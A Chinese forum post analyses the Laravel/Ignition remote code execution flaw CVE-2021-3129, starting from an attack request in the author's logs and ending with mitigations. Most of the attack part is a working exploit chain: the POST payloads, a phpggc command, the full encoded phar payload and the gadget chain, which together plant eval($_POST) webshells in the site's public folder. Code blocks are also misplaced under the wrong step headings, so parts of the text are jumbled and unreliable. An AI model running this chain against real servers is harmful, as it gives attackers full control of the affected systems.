翼度科技»论坛 编程开发 PHP 查看内容

深入理解Laravel(CVE-2021-3129)RCE漏洞(超2万字从源码分析黑客攻击流程)

9

主题

9

帖子

27

积分

新手上路

Rank: 1

积分
27
背景

近期查看公司项目的请求日志,发现有一段来自俄罗斯首都莫斯科(根据IP是这样,没精力溯源)的异常请求,看传参就能猜到是EXP攻击,不是瞎扫描瞎传参的那种。日志如下(已做部分修改):
  1. [2023-11-17 23:54:34] local.INFO:
  2. url      : http://xxx/_ignition/execute-solution
  3. method   : POST
  4. ip       : 109.237.96.251
  5. ua       : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
  6. payload  : {"solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{"variableName":"zzzz","viewFile":"php:\/\/filter\/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode\/resource=..\/storage\/logs\/laravel.log"}}
  7. file     : []
  8. header   : {"content-type":"application\/json"}
  9. time     : 38.50
  10. mem      : 20 MB
  11. user_id  : 0
  12. response : ""
  13. 还有几个请求日志特别长,需要多个请求一起利用才可Pwn,在此处就不展示了。
复制代码
临时解决:

发现漏洞时已经是半夜了,考虑到防止公司项目中招又不影响业务。直接封禁了这个莫斯科的IP,并直接在框架的public目录下建立了_ignition/execute-solution目录,因为nginx访问目录的优先级比laravel路由优先级高,再次访问就是403了。
等配置完了,最后发现是虚惊一场,因为项目用了更高的laravel和Ignition版本,生产与测试环境的版本已经是打过补丁的版本了。
有人说世界上的黑客分两种,一种是俄罗斯黑客,一种是其它国家的黑客,黑客千千万,可见俄罗斯黑客的实力。这么好的对抗黑客案例怎么能视而不见,值得挑战,从源码盘它

漏洞利用环境:


Laravel makeOptional($parameters);        if ($output !== false) {            file_put_contents($parameters['viewFile'], $output);        }    }[/code]危险程度:

可生成一句话木马,利用一句话木马,PHP可以对文件,对数据库,进行各种增删改查操作,相当于服务器沦陷,危险程度可想而知。
漏洞利用复现步骤:

1. 配置具有RCE的环境,并启动项目(需开启Laravel框架debug模式)
  1.     public function makeOptional(array $parameters = [])
  2.     {
  3.         $originalContents = file_get_contents($parameters['viewFile']);
  4.         $newContents = str_replace('$'.$parameters['variableName'], '$'.$parameters['variableName']." ?? ''", $originalContents);
  5.         $originalTokens = token_get_all(Blade::compileString($originalContents));
  6.         $newTokens = token_get_all(Blade::compileString($newContents));
  7.         $expectedTokens = $this->generateExpectedTokens($originalTokens, $parameters['variableName']);
  8.         if ($expectedTokens !== $newTokens) {
  9.             return false;
  10.         }
  11.         return $newContents;
  12.     }
  13.    
  14.    
  15.     public function run(array $parameters = [])
  16.     {   
  17.         $output = $this->makeOptional($parameters);
  18.         if ($output !== false) {
  19.             file_put_contents($parameters['viewFile'], $output);
  20.         }
  21.     }
复制代码
2. 发送如下POST请求,如果发现报错,证明前置流程已经走通。
  1. git clone https://github.com/laravel/laravel.git
  2. cd laravel
  3. git checkout e849812
  4. composer install
  5. composer require facade/ignition==2.5.1
  6. cp .env.example .env
  7. #使用服务器启动项目或者php artisan serve看个人喜好,我的访问站点是192.168.3.180
复制代码
3. 发送请求,清空日志文件,留出空间用于存放漏洞数据数据
  1. url: http://192.168.3.180/_ignition/execute-solution
  2. method: post
  3. payload:
  4. {
  5.     "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  6.     "parameters": {
  7.         "variableName": "zzzz",
  8.         "viewFile": "larvel.log"
  9.     }
  10. }
  11. 若程序提示ErrorException: file_get_contents(larvel.log): failed to open stream: No such file or directory in file说明环境配置正确。
复制代码
4. 发送以下内容,用于日志格式对齐
  1. #这一步不能报错,如果报错,请重新再来
  2. url: http://192.168.3.180/_ignition/execute-solution
  3. method: post
  4. payload:
  5. {
  6.         "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  7.         "parameters": {
  8.                 "variableName": "zzzz",
  9.                 "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
  10.         }
  11. }
复制代码
5. 使用phpggc生成phar编码后的序列化利用POC(注意路径是定制化的)
  1. #这一步报错没关系
  2. url: http://192.168.3.180/_ignition/execute-solution
  3. method: post
  4. {
  5.   "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  6.   "parameters": {
  7.     "variableName": "username",
  8.     "viewFile": "AA"
  9.   }
  10. }
复制代码
6. 发送如下数据,清空对log文件中的其它字符,只留下POC(和清空日志的一样)
  1. #此处的/Host/laravel,实际上是根据之前的报错信息获取的,因为开启了debug模式。
  2. php -d "phar.readonly=0" /test/phpggc/phpggc Laravel/RCE5 "\$c='echo PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7ID8+| base64 -d > /Host/laravel/public/server.php';system(\$c);exec(\$c);shell_exec(\$c);eval('file_put_contents("/Host/laravel/public/s.php", base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7ID8+"));');" --phar phar -o php://output | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:]+ '=00' for i in sys.stdin.read()]).upper())"
  3. #将生成出来的poc再次发送给laravel项目,记得将乱码的末尾添加一个a,这一步报错没关系
  4. url: http://192.168.3.180/_ignition/execute-solution
  5. method: post
  6. {
  7.         "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  8.         "parameters": {
  9.                 "variableName": "username",
  10.                 "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=72=00=6B=00=41=00=67=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=75=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=55=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=51=00=6E=00=56=00=7A=00=58=00=45=00=52=00=70=00=63=00=33=00=42=00=68=00=64=00=47=00=4E=00=6F=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=59=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=46=00=31=00=5A=00=58=00=56=00=6C=00=55=00=6D=00=56=00=7A=00=62=00=32=00=78=00=32=00=5A=00=58=00=49=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=55=00=36=00=49=00=6B=00=31=00=76=00=59=00=32=00=74=00=6C=00=63=00=6E=00=6C=00=63=00=54=00=47=00=39=00=68=00=5A=00=47=00=56=00=79=00=58=00=45=00=56=00=32=00=59=00=57=00=78=00=4D=00=62=00=32=00=46=00=6B=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=41=00=36=00=65=00=33=00=31=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=30=00=4F=00=69=00=4A=00=73=00=62=00=32=00=46=00=6B=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=67=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=51=00=6E=00=4A=00=76=00=59=00=57=00=52=00=6A=00=59=00=58=00=4E=00=30=00=61=00=57=00=35=00=6E=00=58=00=45=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=45=00=56=00=32=00=5A=00=57=00=35=00=30=00=49=00=6A=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=45=00=77=00=4F=00=69=00=4A=00=6A=00=62=00=32=00=35=00=75=00=5A=00=57=00=4E=00=30=00=61=00=57=00=39=00=75=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=4D=00=79=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=4E=00=72=00=5A=00=58=00=4A=00=35=00=58=00=45=00=64=00=6C=00=62=00=6D=00=56=00=79=00=59=00=58=00=52=00=76=00=63=00=6C=00=78=00=4E=00=62=00=32=00=4E=00=72=00=52=00=47=00=56=00=6D=00=61=00=57=00=35=00=70=00=64=00=47=00=6C=00=76=00=62=00=69=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6A=00=62=00=32=00=35=00=6D=00=61=00=57=00=63=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=55=00=36=00=49=00=6B=00=31=00=76=00=59=00=32=00=74=00=6C=00=63=00=6E=00=6C=00=63=00=52=00=32=00=56=00=75=00=5A=00=58=00=4A=00=68=00=64=00=47=00=39=00=79=00=58=00=45=00=31=00=76=00=59=00=32=00=74=00=44=00=62=00=32=00=35=00=6D=00=61=00=57=00=64=00=31=00=63=00=6D=00=46=00=30=00=61=00=57=00=39=00=75=00=49=00=6A=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=35=00=68=00=62=00=57=00=55=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=57=00=4A=00=6A=00=5A=00=47=00=56=00=6D=00=5A=00=79=00=49=00=37=00=66=00=58=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=32=00=39=00=6B=00=5A=00=53=00=49=00=37=00=63=00=7A=00=6F=00=79=00=4E=00=54=00=51=00=36=00=49=00=6A=00=77=00=2F=00=63=00=47=00=68=00=77=00=49=00=43=00=52=00=6A=00=50=00=53=00=64=00=6C=00=59=00=32=00=68=00=76=00=49=00=46=00=42=00=45=00=4F=00=58=00=64=00=68=00=53=00=45=00=46=00=6E=00=57=00=6C=00=68=00=61=00=61=00=47=00=4A=00=44=00=5A=00=32=00=74=00=59=00=4D=00=55=00=4A=00=51=00=56=00=54=00=46=00=53=00=59=00=6B=00=6F=00=79=00=52=00=57=00=35=00=59=00=55=00=32=00=73=00=33=00=53=00=55=00=51=00=34=00=4B=00=33=00=77=00=67=00=59=00=6D=00=46=00=7A=00=5A=00=54=00=59=00=30=00=49=00=43=00=31=00=6B=00=49=00=44=00=34=00=67=00=4C=00=30=00=68=00=76=00=63=00=33=00=51=00=76=00=62=00=47=00=46=00=79=00=59=00=58=00=5A=00=6C=00=62=00=43=00=39=00=77=00=64=00=57=00=4A=00=73=00=61=00=57=00=4D=00=76=00=63=00=32=00=56=00=79=00=64=00=6D=00=56=00=79=00=4C=00=6E=00=42=00=6F=00=63=00=43=00=63=00=37=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=4B=00=43=00=52=00=6A=00=4B=00=54=00=74=00=6C=00=65=00=47=00=56=00=6A=00=4B=00=43=00=52=00=6A=00=4B=00=54=00=74=00=7A=00=61=00=47=00=56=00=73=00=62=00=46=00=39=00=6C=00=65=00=47=00=56=00=6A=00=4B=00=43=00=52=00=6A=00=4B=00=54=00=74=00=6C=00=64=00=6D=00=46=00=73=00=4B=00=43=00=64=00=6D=00=61=00=57=00=78=00=6C=00=58=00=33=00=42=00=31=00=64=00=46=00=39=00=6A=00=62=00=32=00=35=00=30=00=5A=00=57=00=35=00=30=00=63=00=79=00=67=00=69=00=4C=00=30=00=68=00=76=00=63=00=33=00=51=00=76=00=62=00=47=00=46=00=79=00=59=00=58=00=5A=00=6C=00=62=00=43=00=39=00=77=00=64=00=57=00=4A=00=73=00=61=00=57=00=4D=00=76=00=63=00=79=00=35=00=77=00=61=00=48=00=41=00=69=00=4C=00=43=00=42=00=69=00=59=00=58=00=4E=00=6C=00=4E=00=6A=00=52=00=66=00=5A=00=47=00=56=00=6A=00=62=00=32=00=52=00=6C=00=4B=00=43=00=4A=00=51=00=52=00=44=00=6C=00=33=00=59=00=55=00=68=00=42=00=5A=00=31=00=70=00=59=00=57=00=6D=00=68=00=69=00=51=00=32=00=64=00=72=00=57=00=44=00=46=00=43=00=55=00=46=00=55=00=78=00=55=00=6D=00=4A=00=4B=00=4D=00=6B=00=56=00=75=00=57=00=46=00=4E=00=72=00=4E=00=30=00=6C=00=45=00=4F=00=43=00=73=00=69=00=4B=00=53=00=6B=00=37=00=4A=00=79=00=6B=00=37=00=49=00=47=00=56=00=34=00=61=00=58=00=51=00=37=00=49=00=44=00=38=00=2B=00=49=00=6A=00=74=00=39=00=66=00=58=00=30=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=6E=00=52=00=68=00=54=00=5A=00=51=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=78=00=70=00=55=00=50=00=36=00=64=00=78=00=54=00=61=00=73=00=5A=00=2B=00=50=00=68=00=55=00=73=00=47=00=31=00=6C=00=44=00=31=00=59=00=79=00=47=00=48=00=4A=00=4D=00=43=00=41=00=41=00=41=00=41=00=52=00=30=00=4A=00=4E=00=51=00=67=00=3D=00=3D=00a"
  11.         }
  12. }
复制代码
7. 使用phar协议触发序列化生成一句话木马(注意路径是定制化的)
  1. url: http://192.168.3.180/_ignition/execute-solution
  2. method: post
  3. payload:
  4. {
  5.         "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  6.         "parameters": {
  7.                 "variableName": "username",
  8.                 "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
  9.         }
  10. }
  11. #如果这一步出错,请重新再来,这一步不能报错,如果报错,下面的流程走不下去。
复制代码
8. 检测一句话木马存在

此时已经在项目的public目录下,生成了s.php和server.php的一句话木马,内容为
  1. [/code][size=5]解决方案[/size]
  2. [list=1]
  3. [*]或直接升级laravel和Ignition版本,laravel需要8.4.2以上,Ignition需要2.5.1以上。
  4. [*]或简单粗暴,或者直接在public目录下创建_ignition/execute-solution目录(千万别让强迫症同事删了,哈哈)。
  5. [*]或关闭debug模式。
  6. [*]或在vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php的makeOptional()中临时加入以下代码:
  7. [/list][code]<?php eval($_POST['eval']) ?>
复制代码
扩展知识

facade/ignition 扩展作用

是Laravel debug模式下,在程序报错时用于展现漂亮的错误页面的扩展。
为什么要开启debug模式才有下效

vendor/facade/ignition/src/IgnitionServiceProvider.php中设定的路由有前置中间件,调用了vendor/facade/ignition/src/Http/Middleware/IgnitionEnabled.php中间件,中间件对debug配置有验证
php://filter协议是什么

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents()、file_put_contents(), 在数据流内容读取之前没有机会应用其他过滤器。
简单用法案例:
  1. if (! Str::startsWith($path, ['/', './'])) {
  2.     return false;
  3. }
  4. if (! Str::endsWith($path, '.blade.php')) {
  5.     return false;
  6. }
  7. //缺点就是代码库不会被同步,一般情况下vendor下的文件是不推荐修改的。
复制代码
为什么此次攻击要用php://filter?

传入的参数被file_get_contents()接收,file_get_contents()和file_put_contents()支持php://filter协议,起到把转码类型的字符串当做代码来解析的作用。如果传入php函数会被当做字符串去处理,而不会当做代码去执行。毕竟php也不会有这么大漏洞,随便传递php脚本就当做代码执行。
php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log的技术性作用?

|:相当于linux的管道符号。
write:向数据流中写入数据,后面跟写入的数据流。
resource:要筛选过滤的数据流,参数跟文件路径。
convert:代表做格式转换的关键字。
iconv:转码关键字。
utf-8.utf-16le:utf-8转为utf-16le编码,注意转化后的数据占两个字节,还可能会产生不可打印字符。
quoted-printable-decode:将文本转换为 quoted-printable 格式。Quoted-printable 是一种用于将非 ASCII 字符编码为 ASCII 字符的传输编码方式,可参考PHP的quoted_printable_encode()函数,用来打印不可见字符的,因为utf-8.utf-16le转化之后,utf16-le字符的编码占两个字节,会出现一些不可打印的字符,此时为了防止file_get_contents()加载NULL字节的数据会导致PHP Warning:  file_get_contents() expects parameter 1 to be a valid path, string given in php shell code on line n产生的错误。
base64-decode:顾名思义,base64解码,但要注意,解码过程中会忽略掉非Base64字符的数据。
../storage/logs/laravel.log:被操作的文件。以public/index.php作为参考系。
php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log为什么会清空日志?
  1. //将字符串base64编码后存入文件
  2. file_put_contents("php://filter/write=convert.base64-encode/resource=example.txt","Hello World");
  3. //从文件中读取数据并base64解码
  4. file_get_contents("php://filter/read=convert.base64-decode/resource=example.txt");
复制代码
php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log为什么能在日志中产生符合phar规范的恶意代码?

写入日志的流程同上,就不过多赘述了。
phpggc用来生成laravel反序列化漏洞,而上文使用php命令行生成phar文件,使用python来转码phar文件。
传入请求后, 只要能到file_get_contents()函数,至少传入的恶意代码,是可以写入到日志的,那怕是file_get_contents()报错,因为报错信息会携带编码过的恶意代码保存到日志,这也是能够传入恶意payload的主要原因。
当传入成功之后,进行了一遍quoted-printable-decode,把传入的payload变成了base64的数据,其余的日志不发生变化。然后将utf-16le.utf-8,此时其余的日志文件会发生乱码,但是恶意payload以前已经被转成utf-16le,此时转化为utf-8不会报错,而且能正常解析,到这一步可分离出正常代码与恶意代码。此时恶意payload是base64的,但是其余的乱码字符不是,由于base64的特性,遇到不是非base64字符的会忽略,然后日志文件也就剩下恶意代码了,然后走接下来的file_put_contents流程被写入日志,此时的日志文件已经成为了phar文件,如果使用phar,就可以执行它。
quoted_printable_decode()在本次攻击中的逻辑作用?

清除日志时,这个函数没有什么作用,关键是在向日志中传递恶意payload时,解码传递的payload为base64格式。
第五步时,python命令暗含quoted_printable_encode()的作用?

在第五步时,已经实现了quoted_printable_encode(),目的是为了防止执行file_get_contents()时\00(空字节)报错,为了将不可打印打印出来,转成ascii,也就是转化成“=00”。
convert.iconv.utf-16le.utf-8在本次攻击中的逻辑作用?

作用1:清除日志:quoted_printable_decode()不会对原始日志字符串怎么样,关键是遇到utf-16le转utf-8之后,会把字符转为乱码,而base64解码只会解析base64能够生成的字符,utf16le属于两个字节,甚至存在一些不可打印字符,不属于base64字符的会直接忽略,如果都忽略掉,那么结果就是空字符,file_put_contents()就会清空日志文件。
作用2:生成phar字符串:上文已经说明,就是为了分离,恶意代码与普通日志。
base64_decode在本次攻击中的逻辑作用?

清除原始日志内容,因为原始的日志内容已经经过上一个管道( convert.iconv.utf-16le.utf-8)的转化,变成了乱码,由于base64忽略非base64预定字符的特性,此时再次调用base64解码,可以清空乱码的日志文件,只保留可以被解析的恶意payload。
为什么会有第四步的日志格式对齐?

试过填充两个字母也行,为的是让编码能够更好的对齐,如果没有对齐会导致解析失败。
utf-16le解析是通过2个字节解析的,前面不加东西,某些时候会解析出错,导致整个利用链出错。包括第5步的日志最后加的a也同理。就是为了编码对齐的情况下两个payload故意错位来保证攻击高可用。
因为恶意的payload是嵌入在日志当中的,想要通过各种转码只留下payload,确实需要一些编码对齐的前提下去转码。
在日志重抽象出来,简化一下,可以理解为:
[其它日志内容]PAYLOAD[其它日志内容]PAYLOAD[其它日志内容],
此时有两个payload,其实只要一个payload就行了,但是由于日志内容长度的不确定性,所以在对齐的情况下要互相错位,通俗讲,对齐后,两个payload一个使用偶数字节对齐,一个使用奇数字节对齐,这样可以保证不管解析的哪一个,都能有一个对齐成功,另一个对齐失败。对其成功的就可以正常解析。
这个攻击逻辑是根据日志格式倒推出来的。
  1. vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php文件
  2. makeOptional方法中的读操作:
  3. 参数接受的是原封不动传递过来的json,只要$parameters['viewFile']参数存在且可访问,那么$originalContents变量就可以获取日志的数据,流程能走到这个阶段,证明读文件没啥问题,此方法后续的代码可以直接跳过。
  4. run方法中的写操作:
  5. 参数接受的是原封不动传递过来的json,makeOptional方法是被上方紧挨着的run方法调用,调用makeOptional方法后只要结果不是false,然后就写入文件。
  6. 所以这次请求的核心逻辑,提取出来,也就相当于
  7. $file_content = file_get_contents($parameters['viewFile']);
  8. file_put_contents($parameters['viewFile'], $file_content);
  9. 而且viewFile就是php:\/\/filter\/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode\/resource=..\/storage\/logs\/laravel.log
  10. 再次精炼:
  11. $file = "php://filter/write=convert.iconv.utf-8.utf-16le|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=F:/a.txt";
  12. file_put_contents($file, 'text');
  13. 再次精炼(移除convert.quoted-printable-decode,照样可清空日志):
  14. file_put_contents("php://filter/write=convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log", 'aaaabbbcc');
  15. 转化:
  16. file_put_contents参数1可以理解成file_put_contents('../storage/logs/laravel.log', base64_decode(iconv('utf-16le', 'utf-8', file_get_contents('../storage/logs/laravel.log'))));
  17. 当base64_decode函数的操作数据无法解码时会直接忽略,整个日志文件都无法被base64解码,base64只能返回空字符串,也就是内容,php://filter中resource参数是用于定位要操作的文件。
  18. 由于没加FILE_APPEND,那么会导致这个函数会清空文件数据后再在追加数据,追加给谁,和追加什么数据,就是刚才说的内容和文件。
  19. file_put_contents参数2参数没追加到文件中,也可能是这个函数机制问题,曾经反复尝试,就是没有执行。
复制代码
或许难以理解,利用bash shell抽象演示一下这个流程:
  1. 第4步和第5步的日志,简化后的日志格式如下:请注意=50=00=...=00a所在位置
  2. [2023-11-19 17:30:07] local.ERROR: file_get_contents(AA): failed to open stream: No such file or directory {"exception":"[object] (ErrorException(code: 0): file_get_contents(AA): failed to open stream: No such file or directory at /Host/laravel/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php:75)
  3. [stacktrace]
  4. #0 [internal function]: Illuminate\\Foundation\\Bootstrap\\HandleExceptions->handleError(2, 'file_get_conten...', '/Host/laravel/v...', 75, Array)
  5. #1 /Host/laravel/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php(75): file_get_contents('AA')
  6. "}
  7. [2023-11-19 17:30:13] local.ERROR: file_get_contents(=50=00=...=00a): failed to open stream: Invalid argument {"exception":"[object] (ErrorException(code: 0): file_get_contents(=50=00=...=00a): failed to open stream: Invalid argument at /Host/laravel/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php:75)
  8. [stacktrace]
  9. #0 [internal function]: Illuminate\\Foundation\\Bootstrap\\HandleExceptions->handleError(2, 'file_get_conten...', '/Host/laravel/v...', 75, Array)
  10. "}
复制代码
如果没有对齐会发生什么?日志文件太多,还是直接用bash抽象出来:
  1. #模拟输出utf-16le字符后重定向到文件,相当于第4步的日志格式对齐。
  2. #命令说明:echo -n 不输出行尾的换行符。-e 允许对下面列出的加反斜线转义的字符进行解释
  3. echo -ne '[日志]P\0A\0Y\0L\0O\0A\0D\0[日志]P\0A\0Y\0L\0O\0A\0D\0[日志]' > /test/test.txt
  4. #PHP打印,相当于第6步攻击
  5. php -r "echo file_get_contents('php://filter/read=convert.iconv.utf16le.utf-8/resource=/test/test.txt');"
  6. ꖗ뿥嶗PAYLOADꖗ뿥嶗PAYLOADꖗ뿥嶗
  7. #如果在日志中了追加了任意字符"Q"用来模拟对齐,如下:
  8. echo -ne '[日志]P\0A\0Y\0L\0O\0A\0D\0Q[日志-]P\0A\0Y\0L\0O\0A\0D\0Q[日志]' > /test/test.txt
  9. #那么输出的就只剩下一个payload了。
  10. php -r "echo file_get_contents('php://filter/read=convert.iconv.utf16le.utf-8/resource=/test/test.txt');"
  11. ꖗ뿥嶗PAYLOAD孑韦鞿偝䄀夀䰀伀䄀䐀儀ꖗ뿥嶗
  12. #但是由于日志内容的不确定性,也许解析的是前面的payload,也有可能是后面的第二个payload。为了保证攻击高可用,所以需要故意错位。
复制代码
什么是phpggc?

开源代码和官方文档
PHPGGC全称PHP Generic Gadget Chains,通用小工具链条。
PHPggc通俗讲就是CodeIgniter4、Doctrine、Drupal7、Guzzle、Laravel、Magento、Monolog、Phalcon、Podio、Slim、SwiftMailer、Symfony、Wordpress、Yii 和Zend框架的反序列化漏洞利用程序,此工具可以产生漏洞利用的恶意代码。
生成POC时,python -c "import sys;print(''.join(['=' + hex(ord(i))[2:]+ '=00' for i in sys.stdin.read()]).upper())是做什么的?

python -c command命令行模式下运行。
import sys;:导入 Python 的 sys 模块,该模块提供了与 Python 解释器及其环境交互的功能。
sys.stdin.read() 从标准输入读取文本内容。
for i in sys.stdin.read() 循环遍历输入中的每个字符 i。
ord(i) 返回字符 i 的 ASCII 值。
hex(ord(i))[2:] 将 ASCII 值转换为十六进制表示,并去掉开头的 ‘0x’。
=' + hex(ord(i))[2:] + '=00' 组合成 “=ASCII值=00” 的格式。
['=' + hex(ord(i))[2:] + '=00' for i in sys.stdin.read()] 使用列表推导式将每个字符转换成 “=ASCII值=00” 的格式。
''.join() 将转换后的每个字符连接起来。
.upper() 将最终结果转换为大写形式。
print() 输出最终的转换结果。
phar是什么?

官方文档·
phar 扩展提供了一种将整个 PHP 应用程序放入单个叫做“phar”(PHP 归档)文件的方法,以便于分发和安装。 除了提供此服务外,phar 扩展还提供了一种文件格式抽象方法。可以简单的理解为java的jar包,但是两者没有太多的相似性。
什么是phar反序列化?

Phar 反序列化漏洞是一种存在于 PHP 的 Phar 扩展中的安全漏洞,攻击者可以利用该漏洞构造恶意代码并在受害者服务器上执行任意命令。
攻击者利用该漏洞通常需要将构造好的恶意代码先存储在一个经过篡改的 Phar 文件中,然后将该文件传递给目标服务器并进行反序列化操作,从而导致代码的执行。
phar:///Host/laravel/storage/logs/laravel.log流程

phar相当于jar包,所以打开有乱码的情况,所以利用phpggc直接执行(注意此处的路径是自定义的):
  1. #故意在头部加了一个A延时没对齐的情况:
  2. echo -ne '[日志]AP\0A\0Y\0L\0O\0A\0D\0[日志]P\0A\0Y\0L\0O\0A\0D\0[日志]' > /test/test.txt
  3. php -r "echo file_get_contents('php://filter/read=convert.iconv.utf16le.utf-8/resource=/test/test.txt');"
  4. PHP Warning:  file_get_contents(): iconv stream filter ("utf16le"=>"utf-8"): invalid multibyte sequence in Command line code on line 1
  5. Warning: file_get_contents(): iconv stream filter ("utf16le"=>"utf-8"): invalid multibyte sequence in Command line code on line 1
复制代码
可查看原始的反序列化字符串:
  1. php /test/phpggc/phpggc Laravel/RCE5 "\$c='echo PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7ID8+| base64 -d > /Host/laravel/public/server.php';system(\$c);exec(\$c);shell_exec(\$c);eval('file_put_contents("/Host/laravel/public/s.php", base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7ID8+"));');"
复制代码
Laravel走了什么流程导致中招的?
  1. O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:"*queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;s:4:"load";}}s:8:"*event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{s:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{s:9:"*config";O:35:"Mockery\Generator\MockConfiguration":1:{s:7:"*name";s:7:"abcdefg";}s:7:"*code";s:254:"<?php $c='echo PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7ID8+| base64 -d > /Host/laravel/public/server.php';system($c);exec($c);shell_exec($c);eval('file_put_contents("/Host/laravel/public/s.php", base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7ID8+"));'); exit; ?>";}}}
  2. 手动格式化后:
  3. O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{
  4.         s:9:"*events";
  5.         O:25:"Illuminate\Bus\Dispatcher":1:{
  6.                 s:16:"*queueResolver";
  7.                 a:2:{
  8.                         i:0;
  9.                         O:25:"Mockery\Loader\EvalLoader":0:{}i:1;
  10.                         s:4:"load";
  11.                 }
  12.         }
